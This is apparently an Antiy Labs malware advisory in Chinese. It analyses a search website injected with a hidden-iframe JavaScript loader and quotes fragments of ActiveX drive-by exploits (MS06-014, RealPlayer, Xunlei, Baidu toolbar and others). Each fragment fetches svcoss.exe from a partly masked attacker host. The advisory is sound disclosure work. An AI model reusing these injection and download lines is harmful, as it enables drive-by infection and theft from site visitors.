| |
12月19日,安天实验室反病毒监测网发现,搜索网(http://we.875***.cn
/index.htm)被黑客植入病毒,用户如果访问该网站,会被病毒感染。系统就会
自动从恶意网站上下载并运行多个恶意程序。被感染病毒的用户可能被远程控制,
盗取用户敏感信息。
该网站的主页里被插入如下循环框架:
被插入代码:<SCRIPT language=JavaScript src="img/css.js"></SCRIPT>
img/css.js关键代码:
1 document.write('<iframe width=50 height=0 style=display:none
src="http://shers.g3****.cn/img/real.gif"></iframe>
2 <script src="http://shers.g3****.cn/img/xpkk.js"></script>
3 {if(new ActiveXObject("DPClient.Vod"))
document.write('<iframe style=display:none
src="http://shers.g3****.cn/img/tok.gif"></iframe>')}
4 if(new ActiveXObject("BaiduBar.Tool.1"))document.
write('<iframe style=display:none
src="http://shers.g3****.cn/img/baidu.gif"></iframe>')}
5 {if(new ActiveXObject("MPS.StormPlayer.1"))document.
write('<iframe style=display:none
src="http://shers.g3****.cn/img/xpbf.gif"></iframe>')}
6 {if(new ActiveXObject("GLCHAT.GLChatCtrl.1"))document.
write('<iframe style=display:none
src="http://shers.g3****.cn/img/xplz.gif"></iframe>')}
7 {if(new ActiveXObject("Pdg2"))document.
write('<iframe style=display:none
src="http://shers.g3****.cn/img/reader.gif"></iframe>')}
8 {if(new ActiveXObject("e.PowerPlayerCtrl.1"))document.
write('<iframe style=display:none
src="http://shers.g3****.cn/img/pps.gif"></iframe>')}
(1) http://shers.g3****.cn/img/real.gif关键的代码:
Real[\"\\x49\\x6d\\x70\\x6f\\x72\\x74\"]
(\"c:\\\\Program Files\\\\NetMeeting\\\\
TestSnd.wav\",PayLoad,\"\",0,0);
afdsffffasdf=\"flsdajflasdjfl32rewr231ffas\";}
var Then=new Date();
Then.setTime(Then.getTime()+24*60*60*1000);
var cookieString=new String(document.cookie);
var cookieHeader=\"Cookie2=\";
var beginPosition=cookieString.
indexOf(cookieHeader);
if(beginPosition==-1){RealExploit();}
虽然代码被加密但从中也可以找到是利用的realplay栈溢出漏洞
c:\Program Files\NetMeeting\TestSnd.wav
其目的下载文件svcoss.exe
(2) http://shers.g3****.cn/img/xpkk.js关键的代码:
document.writeln("\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
\/\/\/\/\/\/\/\/\/\/\/\/\/");
document.writeln("\'I\'Love yrbDior I\'Love yrbDior
I\'Love yrbDior I\'Love yrbDior I\'Love yrbDior
I\'Love yrbDior I\'Love yrbDior ");
document.writeln(" DMq1 = \".exe\"");
document.writeln(" DMq = \"http:\/\/shers.g3****.cn\
/img\/svcoss\"");
document.writeln("\'I\'Love yrbDior I\'Love yrbDior
I\'Love yrbDior I\'Love yrbDior I\'Love yrbDior
I\'Love yrbDior I\'Love yrbDior ");
document.writeln(" Set rbDio = document.
createElement(\"object\")");
document.writeln("\'I\'Love yrbDior
I\'Love yrbDior I\'Love yrbDior I\'Love yrbDior
I\'Love yrbDior I\'Love yrbDior I\'Love yrbDior ");
document.writeln(" ccc=\"clsid:BD96\":
lll=\"C556-65\":sss=\"A3-11D\":iii=\"0-983A-00C\":
ddd=\"04FC29E36\":uso=\"Microsoft.X\":pk=\"MLHTTp\"");
关键ID:clsid:BD96C556-65A3-11D0-983A-00C04FC29E36
利用了MS06-014漏洞,
连接地址:http://shers.g3****.cn/img/svcoss.exe下载文件
(3) http://shers.g3****.cn/img/tok.gif关键的代码:
document.writeln("expires.setTime
(expires.getTime() + 24 * 60 * 60 * 1000);");
document.writeln("var set_cookie =
document.cookie.indexOf(\"3Ware=\"); ");
document.writeln("if (set_cookie == -1)
{document.cookie = \"3Ware=1;expires=\"
+ expires.toGMTString();");
document.writeln("document.write(\'<object
id=\"gl\" classid=\"clsid:F3E70CEA-956E-49CC
-B444-73AFE593AD7F\"><\/object>\');");
document.writeln("var helloworld2Address =
0x0c0c0c0c;");
关键的ID:clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F
利用了讯雷漏洞。
其目的下载文件svcoss.exe
(4) http://shers.g3****.cn/img/baidu.gif关键的代码:
document.writeln("<SCRIPT>document.writeln
(\"<html><head><script>functionLovemswDMqLovemsw
DMqLovemswDMqLovemswDMqLovemswDMqLovemsw
DMqLovemswDMqLovemswDMqLovemswDMqLovemsw
DMqLovemswDMqLoveVC(){VipDMq[\\\"dloadDS
\\\"](\\\"http:\/\/shers.g3****.cn\/img\
/svcoss.cab\\\",\\\"svcoss.exe\\\",0);}
<\\\/script><\\\/head><OBJECT ID=\\\
"VipDMq\\\" cLaSsId=\\\"cLSiD:{A7F05EE4-
0426-454F-8013-C41E3596E9E9}\\\"><\\\/OBJECT>
<script>LovemswDMqLovemswDMqLovemswDMqLovemsw
DMqLovemswDMqLovemswDMqLovemswDMqLovemsw
DMqLovemswDMqLovemswDMqLovemswDMqLoveVC()
<\\\/script><\\\/html>\");<\/SCRIPT>");
关键的ID:cLSiD:{A7F05EE4-0426-454F-8013-C41E3596E9E9}
利用了百度超级搜霸漏洞。
连接地址:http://shers.g3****.cn/img/svcoss.cab
下载文件svcoss.exe
(5) http://shers.g3****.cn/img/xpbf.gif关键的代码:
document.writeln("<SCRIPT>window[\"document\"]
[\"writeln\"](\"<html>\");window[\"document\"]
[\"writeln\"](\"<objectClAsSiD=\\\"\\x43\\x6c\\
x53\\x69\\x44\\x3a\\x36\\x42\\x45\\x35\\x32\\
x45\\x31\\x44\\x2d\\x45\\x35\\x38\\x36\\x2d\\
x34\\x37\\x34\\x66\\x2d\\x41\\x36\\x45\\x32\\
x2d\\x31\\x41\\x38\\x35\\x41\\x39\\x42\\x34\\
x44\\x39\\x46\\x42\\\" id=\\\'ChinaMBs\\\'>
<\\\/object>\")
此段代码被加密,经过加密后其关键的ID:
CLSID:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB
利用暴风影音 2 mps.dll组件多个缓冲区溢出漏洞
其目的下载文件svcoss.exe
(6) http://shers.g3****.cn/img/xplz.gif关键的代码:
document.writeln("id=LoveVChenziLoveVChenzi
LoveVChenziLoveVChenziLoveVChenziLoveVChenzi
LoveVChenziLoveVChenziLoveVChenziLoveVChenzi
LoveVChenziLoveVC ");
document.writeln("style=\"DISPLAY: none\" ");
document.writeln("classid=clsid:AE93C5DF-A990
-11D1-AEBD-5254ABDD2B69><\/OBJECT>")
其关键的ID:clsid:AE93C5DF-A990-11D1-AEBD
-5254ABDD2B69利用了联众大厅的漏洞.
其目的下载文件svcoss.exe
(7) http://shers.g3****.cn/img/reader.gif关键的代码:
document.writeln("document.writeln
("<META http-equiv=Content-Type
content=\"text\/html; charset=gb2312\">");");
document.writeln("document.writeln
("<SCRIPT>window[\"document\"][\"writeln\"]
(\"<html>\");window[\"document\"][\"writeln\"]
(\"<objectClAsSiD=\\\"\\x43\\x6c\\x53\\x69\\x44
\\x3a\\x36\\x42\\x45\\x35\\x32\\x45\\x31\\x44
\\x2d\\x45\\x35\\x38\\x36\\x2d\\x34\\x37\\x34
\\x66\\x2d\\x41\\x36\\x45\\x32\\x2d\\x31\\x41
\\x38\\x35\\x41\\x39\\x42\\x34\\x44\\x39\\x46
\\x42\\\" id=\\\'ChinaMBs\\\'><\\\/object>\"
此段代码被加密,经过加密后其关键的ID:clsid:
{7F5E27CE-4A5C-11D3-9232-0000B48A05B2}
利用超星阅览器漏洞。
其目的下载文件svcoss.exe
(8) http://shers.g3****.cn/img/pps.gif地址失效。
当用户访问http://we.87****.cn/index.htm时,
系统会自动下载以下病毒文件:
http://shers.g3****.cn/img/svcoss.exe
病毒名:( Worm.Win32.PaBug.ep)
|
内容:
病毒上报信箱: